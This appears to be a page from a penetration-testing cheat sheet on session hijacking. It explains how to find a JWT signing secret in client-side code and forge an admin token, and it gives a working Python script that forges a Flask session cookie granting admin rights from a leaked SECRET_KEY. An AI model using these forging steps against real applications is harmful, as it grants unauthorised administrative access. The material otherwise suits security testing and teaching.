Session Hijacking

Client-Side JWT Attack

If there are no cookies being generated before register or login is quite possible that the authorization process in being handled Clint-Side

Enumeration

Go to WebDev Browser and look within the lib folder to find the file relate to JWT, normally is called jwt.js or jwt.ts
Look for the JWT_SECRET and the signing methods
Use jwt.io or JWT Editor extension from Burp Suite to craft a new token signed with the secret and give it the admin role.

Forge Flask Session Cookie

If you got the SECRET_KEY and the session data you may be able to forge a malicious cookie

from flask import Flask
from flask.sessions import SecureCookieSessionInterface
import hashlib

app = Flask(__name__)
app.secret_key = '948bc3cddc2fc42fcc5bb230b17ae23f0181ee62d0502d9d069af9099406c5d9'

# Create a malicious session
session_data = {
    'user': 'admin',
    'role': 'administrator',
    'is_admin': True
}

# Generate the session cookie
session_interface = SecureCookieSessionInterface()
session_cookie = session_interface.get_signing_serializer(app).dumps(session_data)
print(session_cookie)

PreviousPrototype Pollution NextTemplate Manipulation

Last updated 10 days ago